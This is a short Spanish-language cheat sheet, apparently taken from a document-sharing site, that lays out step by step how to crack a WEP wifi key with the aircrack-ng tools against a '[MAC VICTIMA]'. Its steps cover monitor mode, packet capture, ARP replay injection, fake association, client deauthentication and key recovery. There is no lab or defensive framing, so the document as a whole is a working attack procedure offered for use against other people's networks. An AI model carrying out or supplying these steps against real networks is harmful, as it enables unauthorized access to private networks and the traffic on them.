Está en la página 1de 1

Sacar clave WIFI ->>> WEP

airmon-ng start wlan0
Se pone en modo monitor la interfaz wlan0 que es la del wifi. Tras esta operación se creará una nueva interfaz denominada mon0 que es la que utilizaremos para el resto de operaciones.

airodump-ng mon0 -w wep --channel [canal] --bssid [MAC VICTIMA] --ivs.
Se capturan los paquetes de un canal determinado, filtrando dichos paquetes en un MAC en concreto para que resulte más sencillo su manejo. El archivo que se utilizará es “wep”.

aireplay-ng mon0 -3 -a [MAC VICTIMA] -h [MAC MIA] -e [ESSID]
Se realiza el primer ataque obteniendo ARP y ACKs que luego se utilizan en otro comando.

aireplay-ng -1 0 -e [ESSID] -a [MAC VICTIMA] -h [MAC MIA] mon0
Se crea una asociación de un tipo que hace que vaya más rápido la recepción de paquetes.

aireplay-ng -0 1 -a [MAC VICTIMA] mon0
Se hace que pierda la IP la víctima para que solicite de nuevo.

Aireplay-ng -2 –r [archivo generado por lo de los ARPs replay_arp…..] mon0
Se utiliza ciertos paquetes de ARP para realizar otro ataque.

aircrack-ng -0 -n 128 -f 4 wep-01.ivs
Se obtiene la clave. Cada 5000 paquetes recibidos reinicia la búsqueda de la clave.